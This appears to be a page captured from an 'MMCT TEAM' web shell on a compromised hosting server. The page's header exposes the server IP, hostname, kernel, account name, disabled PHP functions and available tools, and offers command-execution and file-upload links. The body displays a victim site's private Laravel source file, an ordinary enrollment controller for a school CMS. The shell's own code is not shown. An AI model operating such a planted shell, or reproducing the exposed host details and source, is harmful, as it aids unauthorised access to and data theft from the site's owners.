MMCT TEAM
Server IP : 103.191.208.50  /  Your IP : 216.73.216.53
Web Server : LiteSpeed
System : Linux orion.herosite.pro 4.18.0-553.53.1.lve.el8.x86_64 #1 SMP Wed May 28 17:01:02 UTC 2025 x86_64
User : celkcksm ( 1031)
PHP Version : 7.4.33
Disable Function : show_source, system, shell_exec, passthru, popen, exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/celkcksm/cms.ncriptech.com/app/Http/Controllers/Admin/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/celkcksm/cms.ncriptech.com/app/Http/Controllers/Admin/EnrollSubjectController.php
<?php

namespace App\Http\Controllers\Admin;

use App\Http\Controllers\Controller;
use App\Models\EnrollSubject;
use Illuminate\Http\Request;
use App\Models\Semester;
use App\Models\Program;
use App\Models\Section;
use App\Models\Subject;
use App\Models\Faculty;
use Toastr;

class EnrollSubjectController extends Controller
{
    /**
     * Create a new controller instance.
     *
     * @return void
     */
    public function __construct()
    {
        // Module Data
        $this->title = trans_choice('module_enroll_subject', 1);
        $this->route = 'admin.enroll-subject';
        $this->view = 'admin.enroll-subject';
        $this->path = 'enroll-subject';
        $this->access = 'enroll-subject';


        $this->middleware('permission:'.$this->access.'-view|'.$this->access.'-create|'.$this->access.'-edit|'.$this->access.'-delete', ['only' => ['index','show']]);
        $this->middleware('permission:'.$this->access.'-create', ['only' => ['create','store']]);
        $this->middleware('permission:'.$this->access.'-edit', ['only' => ['edit','update']]);
        $this->middleware('permission:'.$this->access.'-delete', ['only' => ['destroy']]);
    }

    /**
     * Display a listing of the resource.
     *
     * @return \Illuminate\Http\Response
     */
    public function index()
    {
        //
        $data['title'] = $this->title;
        $data['route'] = $this->route;
        $data['view'] = $this->view;
        $data['path'] = $this->path;
        $data['access'] = $this->access;

        $data['faculties'] = Faculty::where('status', '1')
                            ->orderBy('title', 'asc')->get();
        $data['rows'] = EnrollSubject::orderBy('id', 'desc')->get();

        return view($this->view.'.index', $data);
    }

    /**
     * Show the form for creating a new resource.
     *
     * @return \Illuminate\Http\Response
     */
    public function create()
    {
        //
    }

    /**
     * Store a newly created resource in storage.
     *
     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    public function store(Request $request)
    {
        // Field Validation
        $request->validate([
            'program' => 'required',
            'semester' => 'required',
            'section' => 'required',
            'subjects' => 'required',
        ]);

        // Insert Data
        $enrollSubject = EnrollSubject::firstOrCreate(
            ['program_id' => $request->program, 'semester_id' => $request->semester, 'section_id' => $request->section],
            ['program_id' => $request->program, 'semester_id' => $request->semester, 'section_id' => $request->section]
        );

        // Attach Update
        $enrollSubject->subjects()->sync($request->subjects);

        Toastr::success(__('msg_updated_successfully'), __('msg_success'));

        return redirect()->back();
    }

    /**
     * Display the specified resource.
     *
     * @param  int  $id
     * @return \Illuminate\Http\Response
     */
    public function show(EnrollSubject $enrollSubject)
    {
        //
    }

    /**
     * Show the form for editing the specified resource.
     *
     * @param  int  $id
     * @return \Illuminate\Http\Response
     */
    public function edit(EnrollSubject $enrollSubject)
    {
        //
        $data['title'] = $this->title;
        $data['route'] = $this->route;
        $data['view'] = $this->view;
        $data['path'] = $this->path;
        $data['access'] = $this->access;


        $data['row'] = $enrollSubject;
        $data['rows'] = EnrollSubject::orderBy('id', 'desc')->get();

        $data['faculties'] = Faculty::where('status', '1')->orderBy('title', 'asc')->get();
        $data['programs'] = Program::where('faculty_id', $enrollSubject->program->faculty_id)->where('status', '1')->orderBy('title', 'asc')->get();

        $semesters = Semester::where('status', 1);
        $semesters->with('programs')->whereHas('programs', function ($query) use ($enrollSubject){
            $query->where('program_id', $enrollSubject->program_id);
        });
        $data['semesters'] = $semesters->orderBy('id', 'asc')->get();

        $sections = Section::where('status', 1);
        $sections->with('semesterPrograms')->whereHas('semesterPrograms', function ($query) use ($enrollSubject){
            $query->where('program_id', $enrollSubject->program_id);
            $query->where('semester_id', $enrollSubject->semester_id);
        });
        $data['sections'] = $sections->orderBy('title', 'asc')->get();

        $subjects = Subject::where('status', 1);
        $subjects->with('programs')->whereHas('programs', function ($query) use ($enrollSubject){
            $query->where('program_id', $enrollSubject->program_id);
        });
        $data['subjects'] = $subjects->orderBy('code', 'asc')->get();


        return view($this->view.'.edit', $data);
    }

    /**
     * Update the specified resource in storage.
     *
     * @param  \Illuminate\Http\Request  $request
     * @param  int  $id
     * @return \Illuminate\Http\Response
     */
    public function update(Request $request, EnrollSubject $enrollSubject)
    {
        // Field Validation
        $request->validate([
            'program' => 'required',
            'semester' => 'required',
            'section' => 'required',
            'subjects' => 'required',
        ]);

        $enroll = EnrollSubject::where('id', '!=', $enrollSubject->id)->where('program_id', $request->program)->where('semester_id', $request->semester)->where('section_id', $request->section)->first();

        if(isset($enroll)){
            Toastr::error(__('msg_data_already_exists'), __('msg_error'));
        }
        else
        {
            // Update Data
            $enrollSubject->program_id = $request->program;
            $enrollSubject->semester_id = $request->semester;
            $enrollSubject->section_id = $request->section;
            $enrollSubject->save();

            // Attach Update
            $enrollSubject->subjects()->sync($request->subjects);

            Toastr::success(__('msg_updated_successfully'), __('msg_success'));
        }

        return redirect()->back();
    }

    /**
     * Remove the specified resource from storage.
     *
     * @param  int  $id
     * @return \Illuminate\Http\Response
     */
    public function destroy(EnrollSubject $enrollSubject)
    {
        // Detach
        $enrollSubject->subjects()->detach();

        // Delete Data
        $enrollSubject->delete();

        Toastr::success(__('msg_deleted_successfully'), __('msg_success'));

        return redirect()->route($this->route.'.index');
    }
}

MMCT - 2023